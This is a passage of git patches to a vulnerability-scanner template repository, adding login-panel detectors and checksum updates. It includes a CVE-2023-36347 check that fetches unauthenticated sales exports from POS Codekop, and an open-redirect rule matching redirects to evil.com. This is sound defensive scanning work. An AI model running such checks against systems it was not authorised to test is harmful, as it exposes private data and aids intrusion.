http/misconfiguration/untangle-admin-setup.yaml:48ca3177690a4ffd930faf99a443caade96231c7 http/misconfiguration/ups-status.yaml:e72e5c146b99b7efed8a61faf81517cc5f9e9736 http/misconfiguration/v2x-control.yaml:1e5196bc738b2850f7c29df0a9af5e933fde4e7f @@ -6911,6 +6911,7 @@ http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 http/technologies/spring-detect.yaml:915d140e39b0fd25c725861c526bd2852d3af20a http/technologies/springboot-actuator.yaml:eea78a3c5ccc81b70826132839dd3531ebc07667 http/technologies/springboot-whitelabel.yaml:eb9058fb153f9146a1c1805473ec96199b243184 +http/technologies/statamic-detect.yaml:fe34eae871715d76c164d89ebe0b6c023b51243d http/technologies/strapi-cms-detect.yaml:ab2db3c715882e9487d6cfce22845c3cfb6a5168 http/technologies/subrion-cms-detect.yaml:79c424841060d17ac25109a9ec520c7e0c208bea http/technologies/sucuri-firewall.yaml:4e60a53d2ddcc7b48dc6fcb42149747927a140b4 @@ -8508,7 +8509,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8236c7940702769898d0b91e1e5ce69744a9d159 +templates-checksum.txt:064e83986d9c777dd50b8e1c049b4504b0504818 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d32712c2f0df6515077bcb9cc211293c126be37e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 09:50:28 +0000 Subject: [PATCH 122/375] Auto Template Signing [Sun May 12 09:50:28 UTC 2024] :robot: --- http/technologies/statamic-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml index fe4003d1d6..95c73e7dff 100644 --- a/http/technologies/statamic-detect.yaml +++ b/http/technologies/statamic-detect.yaml @@ -26,3 +26,4 @@ http: part: header regex: - 'X-Powered-By:(.*)Statamic' +# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9f2955134a41d7f4affb98febbeefb01c8d8f16a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Sun, 12 May 2024 19:48:47 +0200 Subject: [PATCH 123/375] Add files via upload --- .../qlikview-accesspoint-panel.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposed-panels/qlikview-accesspoint-panel.yaml diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml new file mode 100644 index 0000000000..88738607fc --- /dev/null +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -0,0 +1,31 @@ +id: qlikview-accesspoint-panel + +info: + name: QlikView AccessPoint Login Panel - Detect + author: righettod + severity: info + description: | + QlikView AccessPoint login panel was detected. + reference: + - https://www.qlik.com/ + - https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"QlikView - AccessPoint" + tags: panel,qlikview,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 3 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")' + condition: and \ No newline at end of file From d74df498cf3b1d051e0ee8d8aadd86b6640e5984 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 12 May 2024 19:54:17 +0200 Subject: [PATCH 124/375] Fix linter error --- http/exposed-panels/qlikview-accesspoint-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index 88738607fc..ba31920c7c 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -19,7 +19,7 @@ http: - method: GET path: - "{{BaseURL}}" - + redirects: true max-redirects: 3 @@ -28,4 +28,4 @@ http: dsl: - 'status_code == 200' - 'contains_any(to_lower(body), "qlikview - accesspoint", "alt=\"qlikview")' - condition: and \ No newline at end of file + condition: and From 903c94b70783bed2e1e21df6026296d9a3ed8f79 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 May 2024 09:13:34 +0530 Subject: [PATCH 125/375] Create CVE-2023-36347.yaml --- http/cves/2023/CVE-2023-36347.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-36347.yaml diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml new file mode 100644 index 0000000000..8e57fd953f --- /dev/null +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-36347 + +info: + name: POS Codekop v2.0 - Broken Authentication + author: princechaddha + severity: high + description: A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data. + impact: | + Successful exploitation could lead to unauthorized access to sensitive information. + remediation: | + Implement proper authentication mechanisms and ensure secure user session management. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-36347 + cwe-id: CWE-306 + epss-score: 0.00103 + epss-percentile: 0.41216 + cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* + metadata: + vendor: codekop + product: codekop + tags: cve,cve2023,codekop,pos,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/excel.php" + - "{{BaseURL}}/pos-kasir-php/excel.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Document" + + - type: word + part: header + words: + - "application/vnd.ms-excel" From 56b6572321589e88fb0f90b77b4cba48b3cadd2f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 13 May 2024 10:08:29 +0530 Subject: [PATCH 126/375] fix FN --- http/exposed-panels/qlikview-accesspoint-panel.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index ba31920c7c..73e33204f8 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -7,25 +7,24 @@ info: description: | QlikView AccessPoint login panel was detected. reference: - - https://www.qlik.com/ - https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm metadata: - max-request: 1 verified: true - shodan-query: http.title:"QlikView - AccessPoint" + max-request: 1 + shodan-query: title:"QlikView - AccessPoint" tags: panel,qlikview,login,detect http: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}/qlikview/FormLogin.htm" - redirects: true - max-redirects: 3 + host-redirects: true + max-redirects: 2 matchers: - type: dsl dsl: - 'status_code == 200' - - 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")' + - 'contains_any(to_lower(body), "qlikview - accesspoint", "alt=\"qlikview")' condition: and From bded94df29937c62154bd09d7e8e0dbce666c7af Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 08:42:57 +0330 Subject: [PATCH 127/375] Add ackee-panel.yaml --- http/exposed-panels/ackee-panel.yaml | 35 ++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/ackee-panel.yaml diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml new file mode 100644 index 0000000000..a93921badc --- /dev/null +++ b/http/exposed-panels/ackee-panel.yaml @@ -0,0 +1,35 @@ +id: ackee-panel + +info: + name: Ackee Panel - Detect + author: userdehghani + severity: info + description: | + self-hosted, node.js based analytics tool for those who care about privacy. + reference: + - https://ackee.electerious.com/ + - https://docs.ackee.electerious.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1495233116 + tags: panel,ackee,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '<title>Ackee' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" \ No newline at end of file From 6295ebaf046bb69223873537a18427b697c25f93 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 08:57:45 +0330 Subject: [PATCH 128/375] Add nocodb-panel.yaml --- http/exposed-panels/nocodb-panel.yaml | 35 +++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/nocodb-panel.yaml diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml new file mode 100644 index 0000000000..17fa2772f9 --- /dev/null +++ b/http/exposed-panels/nocodb-panel.yaml @@ -0,0 +1,35 @@ +id: nocodb-panel + +info: + name: NocoDB Panel - Detect + author: userdehghani + severity: info + description: | + no-code database platform that allows teams to collaborate and build applications with ease of a familiar and intuitive spreadsheet interface + reference: + - https://www.nocodb.com/ + - https://docs.nocodb.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:206985584 + tags: panel,nocodb,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/dashboard/#/signin" + - "{{BaseURL}}/dashboard/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'content="NocoDB' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" \ No newline at end of file From 429cefb3beef92158ddfbd95ce48a56cc898f9d5 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 09:19:51 +0330 Subject: [PATCH 129/375] Update matomo-login-portal.yaml --- http/exposed-panels/matomo-login-portal.yaml | 34 --------------- http/exposed-panels/matomo-panel.yaml | 45 ++++++++++++++++++++ 2 files changed, 45 insertions(+), 34 deletions(-) delete mode 100644 http/exposed-panels/matomo-login-portal.yaml create mode 100644 http/exposed-panels/matomo-panel.yaml diff --git a/http/exposed-panels/matomo-login-portal.yaml b/http/exposed-panels/matomo-login-portal.yaml deleted file mode 100644 index 7acc2f4b04..0000000000 --- a/http/exposed-panels/matomo-login-portal.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: matomo-login-portal - -info: - name: Matomo Login Panel - Detect - author: Arr0way - severity: info - description: Matomo logjn panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - product: matomo - vendor: matomo - tags: panel,matomo - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/matomo" - - stop-at-first-match: true - host-redirects: true - max-redirects: 2 - matchers: - - type: word - part: body - words: - - "Sign in" - - "Matomo" - condition: and -# digest: 4a0a0047304502201c4b93876d4b04d9b5b75c8c17fe6d03ec45002b413803af50ee269c8086c434022100ee5a2b5964c46e904239af345684bc5b2b5f2ebfba45afabdb42f040ca828a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml new file mode 100644 index 0000000000..fc32f136ce --- /dev/null +++ b/http/exposed-panels/matomo-panel.yaml @@ -0,0 +1,45 @@ +id: matomo-panel + +info: + name: Matomo Panel - Detect + author: Arr0way userdehghani + severity: info + description: | + google analytics alternative that protects your data and your customers privacy. + reference: + - https://matomo.org/ + - https://matomo.org/faq/on-premise/installing-matomo/#getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + product: matomo + vendor: matomo + shodan-query: http.favicon.hash:-2023266783 + tags: panel,matomo,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/plugins/CoreHome/images/favicon.png" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'Sign in - Matomo' + - 'content="Matomo' + - 'title="Matomo' + condition: or + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" \ No newline at end of file From 5d93d29b13fd0afdaa6581cd0c8fee88dcf61d44 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 10:14:03 +0330 Subject: [PATCH 130/375] Update jfrog-login.yaml --- http/exposed-panels/jfrog-login.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 6f55f59c98..6791e47677 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -12,20 +12,22 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,jfrog,edb + shodan-query: http.title:"JFrog" + tags: panel,jfrog,edb,detect,login http: - method: GET path: - '{{BaseURL}}/ui/login/' + - '{{BaseURL}}/ui/favicon.ico' matchers-condition: and matchers: - type: word words: - '<title>JFrog' + case-insensitive: true - - type: status - status: - - 200 -# digest: 4b0a00483046022100bfa95e2d95db535d51023522742e67105a4ca44c2195a7bcae99ff18a8a3e215022100cc08d7c15e5b503a664ce40eeeb750549e654f290a8266192954330d210549ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: dsl + dsl: + - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" \ No newline at end of file From 053f4dac26f188f6095d7da918c528be1c95f48b Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 10:23:38 +0330 Subject: [PATCH 131/375] Update open-redirect.yaml --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index d06fd5dde9..d31e0ad413 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -172,7 +172,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: From 57486dba3f9e80f9a5d01be9d2b7a232b0cc6091 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 10:36:07 +0330 Subject: [PATCH 132/375] Update regex101 --- dast/vulnerabilities/redirect/open-redirect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index d31e0ad413..58b8687d39 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -172,11 +172,11 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 - type: status status: - 301 - 302 - 307 -# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950 From 4358527eea0d4d4320f77e487e4f336e2383b2a9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 12:37:16 +0530 Subject: [PATCH 133/375] minor update --- http/cves/2023/CVE-2023-36347.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 8e57fd953f..15e437dfc1 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -4,7 +4,8 @@ info: name: POS Codekop v2.0 - Broken Authentication author: princechaddha severity: high - description: A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data. + description: | + A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data. impact: | Successful exploitation could lead to unauthorized access to sensitive information. remediation: | From 343aa0f6acd4a95afdb0b57d6453e14c8a589688 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:10:23 +0000 Subject: [PATCH 134/375] Auto Generated New Template Addition List [Mon May 13 07:10:23 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 2d8595fdb8..ef0e7a9798 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml @@ -6,4 +7,5 @@ http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/craftercms-detect.yaml +http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml From 5fcc10e4138e3fa3e30fcab735f2aa7ce2a532d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:10:34 +0000 Subject: [PATCH 135/375] Auto Generated Templates Checksum [Mon May 13 07:10:34 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ddf9e1922..b9fb30da51 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3077,6 +3077,7 @@ http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b +http/cves/2023/CVE-2023-36347.yaml:25da245678a22835df7302ab8224f5c565c3ab05 http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672 http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259 http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef @@ -6911,7 +6912,7 @@ http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 http/technologies/spring-detect.yaml:915d140e39b0fd25c725861c526bd2852d3af20a http/technologies/springboot-actuator.yaml:eea78a3c5ccc81b70826132839dd3531ebc07667 http/technologies/springboot-whitelabel.yaml:eb9058fb153f9146a1c1805473ec96199b243184 -http/technologies/statamic-detect.yaml:fe34eae871715d76c164d89ebe0b6c023b51243d +http/technologies/statamic-detect.yaml:9b14322353da40d62d366fab6d4e882025a6d761 http/technologies/strapi-cms-detect.yaml:ab2db3c715882e9487d6cfce22845c3cfb6a5168 http/technologies/subrion-cms-detect.yaml:79c424841060d17ac25109a9ec520c7e0c208bea http/technologies/sucuri-firewall.yaml:4e60a53d2ddcc7b48dc6fcb42149747927a140b4 @@ -8509,7 +8510,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:064e83986d9c777dd50b8e1c049b4504b0504818 +templates-checksum.txt:39a7e0cec9edf7bd2ca8cf594a31545607091e43 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 345eaea194590d6d118184283c171c8e902d6a20 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:11:20 +0000 Subject: [PATCH 136/375] Auto Generated New Template Addition List [Mon May 13 07:11:20 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ef0e7a9798..4c86240f5c 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml From 2582b7c569a38f88101d341c19f14d22461f9437 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:11:29 +0000 Subject: [PATCH 137/375] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index db0d204223..d49650ae17 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' @@ -11,6 +12,7 @@ on: - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/craftercms-detect.yaml' + - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' workflow_dispatch: jobs: From 4529aaeb9af320f29cf467962520978e99921839 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:11:42 +0000 Subject: [PATCH 138/375] Auto Generated Templates Checksum [Mon May 13 07:11:42 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b9fb30da51..7156777c2d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4233,6 +4233,7 @@ http/exposed-panels/pypicloud-panel.yaml:a8e13404f2ea40b2acaad8749a8c69b862e3b5e http/exposed-panels/qBittorrent-panel.yaml:0b49b83c08748b4b91db7e36fb06518a6d08ec88 http/exposed-panels/qdpm-login-panel.yaml:8f5b3e24b7156ab64d0d391ae05c299118ced753 http/exposed-panels/qlik-sense-server.yaml:4db84c0d1e3d5c1cfab2307ce8711291a039c6da +http/exposed-panels/qlikview-accesspoint-panel.yaml:6d6bd76d548c8b60544fdb95b3e8ea9ac7fefd18 http/exposed-panels/qmail-admin-login.yaml:4ba2c84becd76232e9b799bbc3433797e3d5a1f4 http/exposed-panels/qnap/qnap-photostation-panel.yaml:c7692c948143c7affd3ec7447e5038fe3ab23c6d http/exposed-panels/qnap/qnap-qts-panel.yaml:4939e5e7c6952bee595287b84575fad48db6435a @@ -8510,7 +8511,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:39a7e0cec9edf7bd2ca8cf594a31545607091e43 +templates-checksum.txt:437f7d074cf075e18b475cce70f25038eff51a57 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7af0954423728fb03b6102a79c8dd14915f9a81e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:12:05 +0000 Subject: [PATCH 139/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d49650ae17..1334d4f766 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' From 3d912c1cb9cb84adf4e1fd77e86582472e1b9108 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 10:42:14 +0330 Subject: [PATCH 140/375] Adding the name --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 58b8687d39..04b12668ea 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -2,7 +2,7 @@ id: open-redirect info: name: Open Redirect Detection - author: princechaddha + author: princechaddha, AmirHossein Raeisi severity: medium tags: redirect,dast From 2c67e03cd8aae0c8f97f6994ec581eed4cdcb96b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:12:15 +0000 Subject: [PATCH 141/375] Auto Template Signing [Mon May 13 07:12:15 UTC 2024] :robot: --- http/cves/2023/CVE-2023-36347.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 15e437dfc1..7e0206581a 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -41,3 +41,4 @@ http: part: header words: - "application/vnd.ms-excel" +# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 02f99c71ffdb984952789686438d4873698b0cd4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 12:46:14 +0530 Subject: [PATCH 142/375] minor update --- http/exposed-panels/jfrog-login.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 6791e47677..8f9d6a30af 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -4,7 +4,8 @@ info: name: JFrog Login Panel - Detect author: dhiyaneshDK severity: info - description: JFrog login panel was detected. + description: | + JFrog login panel was detected. reference: - 